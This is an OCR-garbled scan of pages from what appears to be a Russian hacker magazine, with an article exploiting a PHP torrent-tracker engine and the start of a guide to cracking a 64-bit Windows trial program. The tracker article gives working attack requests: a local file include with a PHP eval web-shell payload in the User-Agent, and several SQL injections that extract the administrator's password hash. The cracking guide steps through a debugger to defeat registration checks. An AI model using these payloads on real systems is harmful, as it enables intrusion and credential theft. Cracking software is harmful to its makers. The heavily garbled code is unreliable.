более ответственно относятся как к себе, 
так и к своим пользователям. Это видно по 
тому, какие типы уязвимостей остались в 
мобильном интернете спустя несколько лет: 
Ііі и ііі исчезли как класс, скуль-инъекции 
остались, но тихо вырождаются, чтение 
произвольных файлов есть, но крайне 
труднодоступно для обнаружения. Зато все 
эти печальные факты с лихвой компенсиру- 
ются зарождением мобильного кросс-сайт 
скриптинга! Здесь открывается совершенно 
новая стезя для пытливого вап-хакера, 
так что дерзай, и твои старания окупятся 
сторицей. □с 



Ріідимдоы нщго тиіч?йрінск{Ощі|*іі'йсФчцч н 'іт"*р*си*ч* 

БоГСѵѵаге еггог: 



кРРр : / /маргік . ги/сіомпіоасі/геасі . 
ркр?геас1=Рі1ез/ ! ЗтагРРопат/ ! ЗР 
аРді_сі1уа_ЗтагРоѵ/ ! ЗекгеРпуее_ 
косіу_зтагРРопоѵ . РхР&іс1=9 63 8 



№-1*4' нь *іійі умд Ій Г йц ъмылі хЬіе смічрро** и* 

утША ВтЩІ ЯІХПЕ ѴІІІЕ-ЯІ СОХ ЙГіЙ дуЬЕ.Ы и ОЛ1Х ' ' ! А№^кЛШХЕ_іА-і:| 1 «с Іілл I іс 'шхЛиш. ьйІйОСг 

Т1фСтьПіЛіЕЖІі/Л-ЕѴ^[|,№Ш1ЕТьРІ І1ЛЯ 47. 

Г«НЩ, р+ЫІй им 1*1 ІІ Ей Т\* «еЬгпІІІйі іУпаі! ГЗД, ЦчЧ (м ё г* йі ГВДйВД* И №4 Ьт* «ЧІ ЙМ* №й АРЫ 
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ѴѴАРЫШб ЕСТЬ, СИМВОЛ ПОДОБРАН ВЕРНО 



г' 



ш п 



'Г к -ч і 



СМОТРИМ РЕЗУЛЬТАТЫ ЗАПРОСОВ 
К5ЕЫ0СНАТ0АТА.РНР 

| Ш 



ПИЛИМ хВМ 

УЯЗВИМОСТИ СКРИПТОВ 



НЕСТАНДАРТНЫЕ 



НАЗВАНИЯ НЕКОТОРЫХ ФУНКЦИЙ ЯЗЫКА РНР НАСТОЛЬКО ПРОСТЫ 
И ПОНЯТНЫ. А ПРИНЦИПЫ РАБОТЫ КАЖУТСЯ ТАКИМИ ЛОГИЧНЫМИ. 

ЧТО НИ ОДИН БОЛЕЕ-МЕНЕЕ ОПЫТНЫЙ ПРОГРАММИСТ НЕ СТАНЕТ ЛЕЗТЬ 
В ДЕБРИ ДОКУМЕНТАЦИИ. С ЦЕЛЬЮ ВЫЯСНИТЬ. ЧТО КОНКРЕТНО ДЕЛАЕТ 
ДАННАЯ ФУНКЦИЯ. И ПОРОЙ ЗА ТАКУЮ САМОНАДЕЯННОСТЬ МОЖНО 
ПОПЛАТИТЬСЯ СОБСТВЕННЫМ САЙТОМ. БАЗОЙ ПОЛЬЗОВАТЕЛЕЙ 
И РЕПУТАЦИЕЙ. 



ПЕРВИЧНЫЙ ОСМОТР ПАЦИЕНТА Скачиваем движок, распаковы- 
ваем, устанавливаем. Бегло просматриваем все файлы — обращение 
к большинству файлов напрямую закрыто, доступ только через іпбех. 
рбр. Также в системе присутствует та к называемый Апб-Наскіпд Мобиіе 
Ьу СоЬгаСЕК, — он содержится в файле іпсІибе/сгк_рго1:ес1:іоп.рЬр и 
фильтрует переменные, передаваемые в массивах $_5ЕРѴЕР['01ІЕРУ_ 
5ТРІ N0'], $_ЕЕ0СЕ5Т и $_СООКІЕ, на наличие определенных стоп-слов. 
Помимо кода торрент-трекера, движок использует дополнительные 
модули, к файлам которых можно обращаться напрямую. И, разумеется, 
напрямую можно обращаться к файлу ирдгабе.рбр, который необходим 
для обновления движка. С ирдгабе.рбр мы и начнем. Заходим в этот 
файл через браузер напрямую и получаем сообщение о том, что так, мол, 
и так, в целях безопасности пользоваться скриптом апгрейда нам не 
дадут, пока мы не удалим файлик іпзѣаИ.Іоск из корневой директории. 
Углубимся в содержимое файла, чтобы выяснить, что происходит перед 
тем, как мы видим этот текст. 

Обращаем внимание, что для вывода сообщения с приветствием или 
ошибкой скрипт пытается определить язык, на котором это приветствие 
показывать. И для этого вызывается функция ІоасІ_Іапд_біІе(]. Заметь, 
пользователь сам может выбрать, на каком языке ему проще и понятнее 
читать сообщения системы, и реализована эта возможность при помощи 
следующего кода: 



// Оѵеггісіе СЬе Іапдиаде Еііе? 

ІН (іззеС ($_СЕТ [ " 1апд_Пі1е" ] ) ) 

$_8Е88І(Ж [ " іпзЦа11_1апд" ] = $_СЕТ [ " 1апд_Еі1е" ] ; 
еІзеіП (іззеС ($СЬ0ВАЬ8 [ " НТТР_СЕТ_ѴАКЗ " ] [ "1апд_Ні1е" ] ) ) 
$_8Е88І(Ж [ " іпзСаІ 1_1апд " ] = $СЬ0ВАЬ8 [ "НТТР_СЕТ_ 
ѴАКЗ " ] [ " 1апд_:Еі1е" ] ; 

// ІП по Іапдиаде із зеІесСесІ, изе ЕпдІізЪ. аз Щте 
сІе^аиШ 

еізе $_8Е88ІСЖ [ " іпзСа11_1апд" ] = " іпзСаІІ . епдІізЬ.рЬр" ; 

Бегло просматриваем код дальше и видим, что переменная $_ 
5Е55I0N[ ,, іп51:а^^.апд ,, ] никак не фильтруется, и практически сразу, после 
проверки на существование файла с таким именем в папке /Іапдиаде/ 
іпБІаІЦ-апд/, идет ее инклуд: 

// Апсі пом іпсіийе Щте асСиаІ Іапдиаде Нііе іСзеІ^. 

ге<диіге_опсе (йігпате ( ЕІЬЕ ) . ' /Іапдиаде/ іпзСа11_ 

Іапд/ ' . $_8Е88ІСЖ [ " іпзСа11_1апд" ] ) ; 

Перед нами классическая БЕІ-уязвимость, методы работы с которой опи- 
саны в отличной статье Маг'а в ц-ц # 127. И, соответственно, воспользо- 
ваться ей мы можем, отправив, например, запрос: 
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СЕТ ІЩЦр: //зіСе . сот/ирдгасіе .рЪр?1апд_ 
бі1е= /ргос/зеІЕ/ 
епѵігоп&сшсі=рЬріп^о ( ) ; 

ТЗзег-АдепС: <?рЬр еѵаі ( $_СЕТ [стсі] ) ; ?> 

АНАЛИЗИРУЕМ СТОРОННИЕ МОДУЛИ Локальный 

инклуд это, конечно, хорошо, но смущает, что не так уж 
много владельцев трекеров оставляют его в корневой 
директории. По крайней мере, по сведениям гугла, а ему 
я склонен доверять. Поэтому переключаем внимание на 
компоненты от сторонних производителей, присутствующие 
в движке. Основная проблема движков, их использующих, 
заключается в том, что зачастую разработчики придержива- 
ются различных концепций обеспечения безопасности. 
Взгляни на директорию под названием а]ахсбаР первое, 
на что следует обратить внимание, это то, что ни один из 
скриптов в этой папке не использует Апб-Наскіпд Мобиіе, 
который используется во всем остальном движке, а значит, 
и в случае обнаружения потенциальных 50 1_- инъекций 
мучиться придется поменьше. Теперь внимание на файл 
зепбСЬаШаІа.рбр. В первых же строках видим код, который 
сообщает, что в неинициализированные переменные мы 
можем записывать любые значения из массива $_Р05Т: 

і± ( ! іпі_деС ( ' гедізСег_д1оЪа1з ' ) ) { 

ехСгасС ( $_Р08Т , ЕХТК_ЗКІР) ; 

} 

Дальше видим, что значения переменных $п, $с и $и, соот- 
ветственно, попадают в переменные $пате, $ІехІ и $иісІ. 

И в этих переменных слешируются одинарные кавычки, — 
логично предположить, что это сделано для создания види- 
мости защиты от 501-инъекций. 



$пате = 


зСг_гер1асе ( " \ ' " 


, " 1 " , $пате) 


$пате = 


зСг_гер1асе ( " ' " , 


" \ ' " , $пате) 


$ЦехС = 


зСг_гер1асе ( " \ " 


, " 1 " , $СехЦ) 


$СехЦ = 


зВг_гер1асе ( , 


" \ ' " , $ВехС) 



Бегло просмотрев дальнейший код, видим, что, если в 
$пате, $1ех1:, $иісІ что-нибудь записано, то вызывается 
функция абсЮаІа, которая выглядит следующим образом: 

ШпсЦіоп асІсШаСа ( $пате , $СехС / $иіс!) { 

іпсГис!е(" . . /іпсІисІе/зеЦЦіпдз .ріір" ) ; # 

деШіпд СаЫе ргебіх 
$ПШ? = СішеО; 



$зд1 = " ІЫ8ЕР.Т ШТО { $ТАВЬЕ_РКЕЕІХ} сІіаС 
( Сіше, паше, СехС ,иісі) ѴАШЕЗ ( 1 " . $поѵп " 1 , 1 " . $п 
аше . " ' , ' " . $СехС . " 1 , 1 " . $иісІ. " ' ) " ; 

$сопп = деШВСоппесСіоп ( ) ; 

$гезиІСз = тузд1_диегу ( $зд1 , $сопп) ; 

ІТ ( ! $гезиШз I I етрСу ( $гезиШз) ) { 

# есііо ’ТЬеге ѵ^аз ап еггог сгеаСіпд 
Сііе епСгу 1 ; 

епсі; 

} 

} 

Вроде бы разработчики в запросе нигде не забыли окру- 
жить передаваемые параметры одинарными кавычками. 

В параметрах все одинарные кавычки заэкранированы. 

Что же можно сделать в такой ситуации? А вот что — мы 
обратимся к технике работы с так называемыми фрагменти- 
рованными 50І_-инъекциями. Суть в том, что в запросе мы 
можем передать в параметре $пате в качестве последнего 
символа символ «\», и кавычка, идущая после $пате, ока- 
жется заэкранированной! И все, что мы запишем в $ІехІ, 
уже будет интерпретироваться как командная часть запроса, 
а не как просто передаваемые в запрос данные. То есть, на 
примере, — если мы передадим в скрипт такой пакет: 

РОЗТ ЪШр: //СезШ . ги/а5 ахсЬаС/зепсІСЬаЦШЪа . 

ріір 

п=а\&с= , ѵегзіоп ( ) , 1) --%201&и=1 

То в базу пойдет вот такой 50І_-запрос: 

ШЗЕКТ ШТО хЬСіЦ_с1іаЦ (Ціше,паше, СехС ,иісО 
ѴАШЕЗ ( ' 1255641864 ' , ' а\ ' , ' , ѵегзіоп ( ) , 1 ) — 

1' , '1') 

А это значит, что кусок запроса '1 255641 864','аѴ,' Му50І_ 
воспримет как данные, которые необходимо записать в 
поле бте, а в поле пате уже пойдет результат выпол- 
нения функции ѵегзіопО. Осталось найти, где посмотреть 
результат выполнения. Собственно скрипт, позволяющий 
читать из этой таблицы, лежит совсем рядом и называется 
деіСЬаЮаІа.рЬр. 

Чтобы получить пароль администратора, шлем такой запрос 
(у администратора ісі обычно равен 2): 

РОЗТ ІЩЦр: //ЦезЦ2 . ги/а5 ахсЬаЦ/зепйСЪаШаВа . 
ріір 




> СІѴСІ 

На дискеты найдешь 
все скрипты, описан- 
ные в статье. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 




НТТР://ѴѴѴШ 

■ ■ 

> Ііпкз 

• рЬр.пеі/тапиаІ/еп/ 
іпсІех.рЬ —докумен- 
тация по РНР. 

• еѵ.тузді.сот/сіос 

— документация по 
Му5СН_. 

• Іогит.апІісЬаСги/ 
1Ьгеаб1 19047.Ыт1 

— методы быстрой 
работы со слепыми 
инъекциями. 

• ЫірУ/дѵѵагаг.ги — 
тут мне всегда можно 
задатьлюбой вопрос. 
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с=, (зе1есС+раззѵтог<і+ігот+хЬіііЦ_ 
изегз+тлііеге+і<і=2 ) , 1) --%201&и=1&п=а\ 

И по адресу ЬирУ/ЩзіЗ.ги^ахсЬаі/деЮЬаіРаІа.рбр наслаждаемся 
результатом в виде хеша пароля администратора: 

# 15/10/2009 22:45:22 | а\ : 
е00сі25асі42 683ЬЗсіі678с61і42с6Ьсіа 

УГЛУБЛЯЕМСЯ В ДЕБРИ Уязвимость в а]ахсЬа1 это уже лучше, но, как 
легко заметить, она не будет работать при тадіс_дио1:е5=0І\І, что сделает 
часть серверов недоступными для взлома. Нам бы этого не хотелось, так 
что роем дальше. Просматриваем файлы самого движка, и в файле изег/ 
изегср.іпсіех.рбр натыкаемся на код: 

іі ($с!о== "ѵегііу " && $асРіоп== "сЬапдетаіІ" ) { 

// Себ бЬе обЬег ѵаіиез ме пеесі бгот б Ъ.е игі 
$пемпаі1 = $_СЕТ [ "пешпаіі " ] ; 

$іс!=тах ( 0 , $_СЕТ [ "иісі" ] ) ; 

$гапсіот=тах ( 0 , $_СЕТ [ " гапсіот" ] ) ; 

$іс11еѵе1=$Сітіі8ЕК[ " Іс1_1еѵе1" ] ; 

// Себ ббіе тетЪегз гапсіот питЪег, сиггепб етаіі апсі 
бетр етаіі бгот бЬеіг гесогсі 

$дебасс=тузд1_бебсЬ_аззос (сіо_зд1диегу ( " ЗЕЬЕСТ гапсіот, 
етаіі , бетр_етаі1 " . ( ( $СЬОВАЬ8 [ " ЕОЕШЫЖ" ] == " зтб " ) ? 

", зтб_бісі" : "")." бгот { $ТАВЬЕ_РКЕЕІХ}изегз ШЕКЕ 

ісі = " . $ ісі) ) ; 

В нем как раз и встречается та самая обманчивость «простых» функций 
языка РНР. Обратим взгляд на строчку $іб=тах(О,$_0ЕТ["иіб"]]. Многие, 
исходя из названия функции, могут сразу решить, что она просто срав- 
нивает два числа и запишет в $іб большее из них. В принципе, да, 
верно. А что произойдет, если в $_0ЕТ["иісГ] будет не число, а строка, 
к примеру ' 1 ааа'? Тогда можно подумать, что в результате этой функции 
РНР приведет ' 1 ааа' к числу 1, выберет максимальное из 0 и 1 и вер- 
нет соответственно 1. Эти рассуждения почти верны. В документации 
сказано, что функция МАХ(] сравнит аргументы между собой, в данном 
случае — приведет второй аргумент также к числу и вернет больший из 
аргументов в том же виде, в котором функция его и получила! То есть, 
в случае примера, описанного выше, в $іб окажется строка ’іааа', а не 
число 1. И в 50Е-запрос попадет именно эта строка, а не число, как 
предполагали программисты данного участка кода. Для осуществления 
атаки через эту уязвимость для пробы формируем запрос: 

Ьббр : //безб2 . ги/іпсіех . рАр?раде=изегср&с1о=ѵегібу&асбіоп= 
сЪапдетаі 1&иісі= - 1 +ІШІСЖ+ 8ЕЬЕСТ+ 1 , 2 , 3 + -- + 1 

И жестко обламываемся — срабатывает тот самый Апб-Наскіпд Мобиіе, 

► 056 



которому не нравится присутствие слов ІЛЧІОЫ 5ЕЕЕСТ в запросе. 
Вывода ошибки на экран в случае неверного запроса нет, а значит, 
инъекцию придется крутить как слепую. Посмотрим на наш запрос: 
мы и так получаем данные из таблицы изегз, и сложных подзапросов 
можно не писать. В запросе из таблицы выбирается строка, в которой 
іб=$_0ЕТ["иісГ]. Но если попробуем передать в параметре $_0ЕТ["иісГ] 
чужой номер ісі, то движок ругнется, что мы можем использовать только 
свой. Ну, ладно, свой так свой. 0нова вспоминаем, как РНР сравнивает 
числа между собой при помощи оператора «==». Если вместо одного из 
чисел встречается строка, то РНР просто отбрасывает из этой строки 
все, начиная с первого нечислового символа. Так, строку «3-1 » оператор 
сравнения воспримет как число 3. А МуЭОЕ, встретив такую операцию в 
запросе, выполнит ее и получит в результате число 2. Поэтому, в случае, 
если твой іб=3, запрос для посимвольного перебора хеша пароля адми- 
нистратора можно сформировать таким образом: 

Ъббр : //безб2 . ги/іпсіех . рЬр?раде=изегср&с1о=ѵегібу&асбіоп= 

сЬапдетаі1&иі(і=3-1+ап(і+101=азсіі 

(зиЬзбгіпд (раззѵсгогсі, 1,1)) 

Если символ подобран верно, получаем предупреждение «ѴѴагпіпд : 
Міззіпд агдитепі; 2 Іог егг_тзд(]»; если неверно — сообщение о том, 
что наш етаіі-адрес был изменен. Если будешь писать сплоит для этой 
уязвимости, не забывай о том, что при работе со слепыми инъекциями 
предпочтительнее использовать метод бинарного (двоичного] поиска. 

контрольный выстрел Какие минусы у прошлой найденной инъ- 
екции? Во-первых, необходимо получить аккаунт на трекере, что может 
быть проблематично, если трекер приватный. Во-вторых, приходится 
тратить время на посимвольный перебор данных из базы. Попробуем 
избавиться от этих ограничений. Для этого посмотрим на функции, кото- 
рые выполняются до того, как пользователь залогинился. Зная «болез- 
ни» данного движка, можно просто присмотреться к использованию 
функций М I N0 и МАХ(]. 

Поиском сразу же находится подходящий уязвимый файл, который 
подключается в самом начале іпбех.рЬр и отрабатывает до того, как 
пользователь логинится. Это файл /іпсІисІеЛипсбопз.рбр. Уязвима функ- 
ция изегІодіпО, которая проверяет, не установлены ли у нас куки с Ю и 
паролем. 

УЯЗВИМЫЙ КОД: 

іі ( ІіззеС ($_СООКІЕ["иісі"] ) ) $_СООКІЕ [ "иісі" ] = 1; 

$ ісі = шах (1 , $_СООКІЕ [ "иісі" ] ) ; 

// ІС ' з диезС 
іі С1$ій) 

$ій=1; 

$гез = ту зд1_диегу ( " ЗЕЬЕСТ щ* епйДіісП и.Сорісзреграде, 
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и . розЬзреграде , и . ЬоггепЬзреграде , 
и.Оад, и.аѵаЬаг, ШІХ_ТІМЕЗТАМР (и. 
ІазЬсоппесЬ) АЗ ІазЬсоппесЬ , ШІХ_ 
ТІМЕЗТАМР (и . з оіпеЫ.) АЗ зоіпесі, и.іЫ. 
аз иі!, и. изегпаше, и.раззѵгогсі, 
и.гапсіот, и.ешаіі, и . Іапдиаде ,и . 
зЬуІе, и . Ьіте_оЬЬзеЬ , иі . * ЕКОМ 
{ $ТАВЬЕ_РКЕЕІХ}изегз и ІШЕК ЮШ 
{$ТАВЬЕ_РРЕЕІХ}изегз_1еѵе1 иі 
ОМ и . Іс1_1еѵе1=и1 . ісЗ. ШЕКЕ и.ісі 

= $іс1") ог зд1егг( ЕІЬЕ , 

ЬШЕ ) ; 



Если бы не было проактивной защиты, можно 
было бы просто вывести все интересующие нас 
поля стандартным методом, сразу после под- 
бора колонок. Но поскольку такой возможности 
нет, обратим внимание на то, что в случае невы- 
полнения запроса мы увидим ошибку, которую 
вернет нам Му5С11_. Поэтому ничто не мешает 
в 5-й ветке вывести интересующее нас поле 
целиком, при помощи метода с использовани- 
ем пате_соп5і(], описанного мной в ц-ц # 129. 
Составляем запрос (не забываем, что иіб долж- 
но начинаться с цифры строго большей, чем 1): 

СЕТ ЫЬр : / / ЬезЬ2 . ги/ іпсіех . рЬр 
Соокіе: иісі=2+апс1+1= (ЗЕЬЕСТ 
* ЕКОМ (ЗЕЬЕСТ * ЕКОМ 
( ЗЕЬЕСТ ЫАМЕ_СОЫЗТ ( ( ЗЕЬЕСТ 
сопсаЬ (изегпаше, 0хЗа,раззтлгогс1) ЕКОМ 
хЬЬіЬ_изегз ШЕКЕ І1=2), 14 ) сЗ.) аз 
Ь ЮШ (ЗЕЬЕСТ ЫАМЕ_СОМЗТ (( ЗЕЬЕСТ 
сопсаЬ (изегпаше, 0хЗа,раззѵ\гогс1) ЕКОМ 
хЬЫЬ_изегз ШЕКЕ і 1=2 ) , 14)х)е) 
к) — 1 

И получаем результат: 

ЕКК_3<2Ь_ЕКК 

ЬирІісаЬе соіитп паше 1 асЗшіп: е00сЬ2 
5а142683Ъ31Ьб78сб1Ь42сбЪс1а ' 
іп 2 : \Ь.оте\ЬезЬ2 . ги\ѵ\ллм\іпс1исіе\ 
ЬипсЬіопз .рЬр , Ііпе 332 

Получили все, что хотели, одним запросом. 
Причем нам не понадобились ни регистрация 
на трекере, ни дополнительное время на пере- 



бор, ни какие-либо особые требования вроде 
тадіс_дио1е5_дрс=(Ж 

ЗАКЛЮЧЕНИЕ Исследуя чужой код на уязви- 
мости, старайся не думать, как программист, 
думай, как хакер. Подвергай сомнению все 



методы, используемые программистом, про- 
веряй их на практике. Не доверяй интуитивно 
понятным вещам. Вдумчиво читай документа- 
цию по всем функциям, которые встречаешь в 
коде и ищи участки кода, в которых нарушается 
логика работы системы безопасности, ц-ц 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение; 

ТСПРіІіГЫІ ИНТЕРНЕТ 

К С Л и П *1ПД« П-ІЭЧКІІІНІ ЕГЕ ГСП АТМО 

■ Подключи мне -■ пмОоы мосте Москвы и Московской овп 
*Срок поди м мчс мим * Мооквв * 14 дней. в Московской обл. - от Т4 до 30 днюй. 
-ѴСТяНййгій ПРЯМОГО МООк&НОкОГО ТвПвфОНН-ОГО Ио*-®рп 
і МНОГОАІИА-КЙНМ* Т*Л*фО»НЙЛ1 Н*иврв 
■ ІР-ТСЛСфОННВ 

* Еіыдвлониыв линии И и г ер мет 
-корпорЛипныв Чй*ТЫЫ*#*1И | V Р N }■ 

• ХОСГгііІГ, услуги Рнтв-чвнтрв 

РЛ/І №№и,пп!.ги «^тпІЕ:іМо(ЭгліІ.ги <49'5) 9Й5 - Й2 12 

Припили л г на спвм>«*лиетвд г нмечдших опмт работа ■ оСлд^г*і тяле-ирмиАуннкдимй 
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I Р0064 РООбЛгаМАИ.РУ 



64-ЬіІ 



РшБИВАЕМ 

ГМ ІП 1 II пггг 



64-ЬіІ 



РУКАМ 0ЕРКА6 



ОСОБЕННОСТИ 

КРЕКИНГА 64-БИТНЫХ ПРИЛОЖЕНИЙ 



С МОМЕНТА ПОЯВЛЕНИЯ 64-РАЗРЯДНЫХ ВЕРСИИ ѴѴІШѴѴВ ПРОШЛО 
НЕМАЛО ВРЕМЕНИ. СУЩЕСТВЕННО УВЕЛИЧИЛОСЬ ЧИСЛО ПОЛЬЗОВАТЕЛЕЙ 
НОВОЙ ПЛАТФОРМЫ. НО ИНФОРМАЦИИ ПО ИССЛЕДОВАНИЮ СОФТА 
ПО-ПРЕЖНЕМУ НЕМНОГО. ЗТО НЕХОРОШО, ТАК КАК ТУТ ЕСТЬ СВОЯ 



СПЕЦИФИКА. О НЕЙ И ПОГОВОРИМ. 

РКЕРАКАТІ0Н8 Я несколько лет занимался исследованием 32-бит- 
ных приложений и, оказавшись в 64-битной винде, понял, что здесь 
все будет не так просто. Первая проблема — это привычный крекеру 
инструментарий. Большинство тулз не портировано под ѴѴіп64. Часть 
приложений, конечно, как работали, так и работают и свою функцию 
выполняют, например, СРР Ехріогег (РЕ-редактор, довольно мощный 
и удобный) — его можно применять как для работы с РЕ-форматом, 
так и с РЕ32+. Но одно дело редактор исполняемого формата, а дру- 
гое — отладчик. Начнем с того, что от ОПуОЬд (полюбившегося многим 
ресечерам) придется отказаться: он же 32-битный! А также отказаться 
от множества плагинов, скриптов и всего, что было нужно для ресеча и 
распаковки 32-разрядных приложений. 

Здесь видится три варианта замены Олли. 

1. Отладчик ГсіЬд с открытым исходным кодом (написан на ассембле- 
ре, исходник для Газпп, ГсІЬд.х86а5іп.пе1: ]. 

Очевидно, что по сравнению с ОПуОЬд — это земля и небо. Первое 
время работать с ним жутко непривычно и неудобно, хоть и трасси- 



ровка, как в Ольге по <Е8>. Проект, правда, перспективный и активно 
развивающийся. Разработчики потихоньку добавляют фичи для скры- 
тия дебаггера, но пока от разных детских шалостей вроде проверок с 
помощью ІзОеЬиддегРгезепІ или Рі псіѴѴі псіоѵѵ. 

2. Встроенный отладчик в ША 64 (в поставке про-версии Иды есть 
64-битная и 32-битная версия). Здесь все гораздо удобнее, чем в ГбЬд, 
однако и к специфике отладки в Иде тоже надо попривыкнуть (осо- 
бенно тем, кто, как и я, юзал ОПуОЬд). Для этого рекомендую утащить 
видео-маны от ТіОа по отладке 64-битных приложений в іба. Там также 
есть маны по распаковке 64-битных пакеров, что тоже очень полезно 
( і:и1:54ѵои.сопп/сІоѵѵп[оасІ.рЬр?[І5Е71 ). 

3. ОеЬиддіпд Тооіз Гог ѴѴіпсІоѵѵз ( тісгозоГЕсот/ѵѵЬсІс/сІеѵГооІз/ 
сіебидді пд/і пзЕа1164Ьі1:.т5рх ) . 

ѴѴіпбЬд предоставляет неплохие возможности для отладки. О много- 
численных расширениях сего отладчика можно прочесть в поставляе- 
мой вместе с ним справке. 

Мне больше всего понравился вариант с Идой. Сразу оговорюсь, 



► 058 
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ВНЕШНИМ ВИД ОТЛАДЧИКА РРВб 



НАСТРОИКИ ДИЗАССЕМБЛЕРА В ЫЕО НЕХ 
ЕРІТОР 



что использую ЮА64 версии 5.2. Вообще, какой дебаггер 
юзать — дело вкуса, да и, в конечном счете, успешность 
решения задачи зависит от того, в чьих руках тот или 
иной инструмент. 

Хорошо, с дизассемблером и отладчиком можно сказать, 
проблема решена. Но это еще не все. Чтобы комфортно 
патчить — нужен хекс-редактор со встроенным дизасм- 
движком. Я привык к Ьіеѵѵ, но версии, которая позволяет 
работать с 64-разрядным кодом, у меня не было. Поэтому 
я нашел альтернативу — Нех ЕсІ М:ог І\Іео. Здесь есть дизас- 
семблер для 64-битного кода, ну и патчить можно, не 
отходя от кассы. Этакая гуи-замена Хью :]. К сожалению, 
программа платная и ее можно взять на пеѵѵ-Ьех-есІіІог. 
сот . Желающие могут заказать и восьмой Ьіеѵѵ с под- 
держкой 64 бит [ Ьіеѵѵ.ги ]. Можно и в 32-битном Хью пат- 
чить 64-разрядный код, но это занятие для извращенцев. 
По софту, нужному для реверса, пока достаточно. Вторая 
проблема — это система команд, к которой надо привы- 
кнуть. В общем-то, с 32-битами, казалось бы, отличий 
немного. Только что регистры в 2 раза стали больше. 

Ан, нет, изменений немало. Исследователь обязательно 
должен иметь под рукой оригинальную документацию от 
производителя, чтобы в случае возникновения вопросов 
мог бы к ней обратиться. 

Обладателям процессоров фирмы «Интел» читать следую- 
щую литературу: іпіеі.сот/ргосіисщ/ргосеззог/тапиаіз/ 
іпіех.Ыт (Іпіеі® 64 а псі ІА-32 АгсЬЕесШгез ЗоіЧѵѵаге 
Оеѵеіорег'з Мапиаіз]. И, соответственно, аналогичная 
документация от АМО: беѵеіорегатсі.сот/сіоситепіюбоп/ 
диісІез/РадезАМаии.азрх . 

В частности, стоит обратить внимание на руководство 
АМ064 АгсЫІесІиге Ргодгатппег'з Мапиаі Ѵоіите 3, — 
различия между 32 и 64 описаны довольно подробно. 
Понятное дело, что для чтения манов нужно знание 
английского. Кто еще не успел выучить — может почитать 
статью Криса Касперски «64-битный привет», там обозна- 
чены основные моменты, необходимые для начала работы. 

РЕ8ЕАРСН Ну вот, подошли к самому главному — ревер- 
су конкретного софта. По ходу дела буду пояснять различ- 
ные 64-разрядные нововведения. Собственно жертвой 
исследований станет софтина Ригад йеітад. Защита 
здесь несложная, как раз чтобы привыкнуть к 64-битному 
крекингу. Работает 30 дней. Все это время в заголовке 
красуется надпись хх Оау(з] Ретаіпіпд. На вкладке Виу 
ІЧоѵѵ нам предлагают ввести регистрационный код и при 
ошибочном вводе выдают сообщение о неверном коде 
(внимание на скриншот]. 

В папке с программой мы видим 2 экзешника — 
РигапОеітадѲІІІ.ехе и РигапАРТ.ехе. Второе — это для 
показа иконки в трее, поэтому загружаем в ЮА64 первое. 
К сожалению, попытки найти строки «Іпѵаіісі гедізІхаЬоп 



кеу», «Тгіаі Ретаіпіпд» ничего не дали. 

Что ж, подготовимся к отладке. В директории с Идой 
лежит файл ѵѵіп64_гетоІех64.ехе, запускаем его. Это 
отладочный сервер. Затем настраиваем клиент. В меню 
ОеЬиддег-^Ргосезз орЬопз прописываем путь к отлажи- 
ваемой программе, а также адрес сервера — 127.0.0.1 
(в нашем случае все локально] и порт — 23946 (смотри 
рисунок]. 

Все готово к дебагу. Теперь определимся с постанов- 
кой бряков. Сообщение, выдаваемое программой при 
неверном коде, напоминает то, что выводится функцией 
МеззадеВохА(ѴѴ). Отправимся в окно Ітрогіз Иды. Ага, и 
правда! Импортируется функция МеззадеВохѴѴ. Ставим 
на нее точку останова. Здесь это делается так же, как и в 
ОНуйЬд — нажатием <Р2> (и удаляется ей же). Запускаем 
программу нажатием <Р9>. Во время запуска возникает 
ряд эксепшнов, которые нужно игнорировать (чтобы не 
отвлекали :]]. Для этого зайдем в ОеЬиддег ОеЬиддег 
орііопз, ЕХСЕРТІ0ІЧ5 -> ЕсІіЕ Существует два варианта 
обращения с эксепшенами: обработать самим или пере- 
дать приложению. Для ЕХСЕРТІ0І\І_АССЕ55_ѴІ0ЕАТІ0М 
(ОхРРРРРРРРСООООООб) выбираем второй вариант — «Разз 
Ію арріісабоп». 

После запуска приложения делаем попытку ввести какой- 
нибудь код и брякаемся на таком фрагменте: 



. РехР : 0000000000420039 
. ДехР : 0000000000420039 
.ДехР: 00 00000 00042Б03С 
.ДехР: 00 00000 00042Б03Р 
. РехР :000000000042Б042 
. РехР : 000000000042 Б0 45 
. СехС : 00 00000 00042Б04В 



1ос_42Б039 : 
тоѵ г9с1, есіі 
тоѵ г8 , гзі 
тоѵ гсіх, г 12 
тоѵ гсх, гІЗ 
саіі сз :МеззадеВохШ 
тоѵ езі, еах 



Первое, что бросается в глаза (за исключением новых 
регистров], — это модель вызова функций. Первые 4 аргу- 
мента в регистрах (гсх, гбх, г8, г9], остальные в стеке. У 
МеззадеВох всего четыре, значит, все в регистрах :). 
Далее смотрим в стек (его можно просмотреть в окне 
ЮАѴіеѵѵ — Р5Р) и переходим по адресу возврата, чтобы 
узнать, откуда вызывается эта процедура, показывающая 
сообщение. 

Окей, еще раз переходим по адресу возврата и видим, что 
ругательство выводит код: 



. ДехР : 0000000000407 094 іпѵа1іс!_гед_сосІе 
ргос пеаг ; СОБЕ ХКЕР : зиЬ_406БР0+5В ^ 

. ДехС : 0000000000407094 

Іеа г8 , СарДіоп ; " Ригап Беігад" 

. РехР :000000000040709В 

Іеа гсіх, аІпѵаІісІКедізЦг ; "Іпѵаіісі 
ВедізДгаЦіоп Кеу" 



гчГЬь 



| НТТР://ѴѴѴѴѴѴ| 

I Г 



> Ііпкз 

• Подробнее о моде- 
ли вызова функций и 

0 РЕ32+ можно про- 
читать в замечатель- 
ной статье Ітргоѵіпд 
АіЛотаІесІ Апаіузіз 

01 ѴѴі псіоѵѵз х64 
Віпагіез ( ипіпіюгтесі. 
огд/?ѵ=4&а=1 &І=рсІ1 : ] . 



• На русском будет 
полезна статья 
«Общие сведения о 
соглашениях о вызо- 
вах для архитектуры 



х64» ( 



сот/ги-ги/ІіЬгагѵ/ 

тз235286.азрх ]. 



• Свои вопросы, ка- 
сающиеся х64, можно 
задать на форуме 
ѵѵазт в одноименном 
разделе. Да и во- 
обще, там много по- 
лезной информации 
по указанной теме: 
ѵѵазт .гиЛо гит/ 
ѵіеѵѵіогит.рЬр?ісІ=31 . 







> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознаком- 
ления! Ни автор, ни 
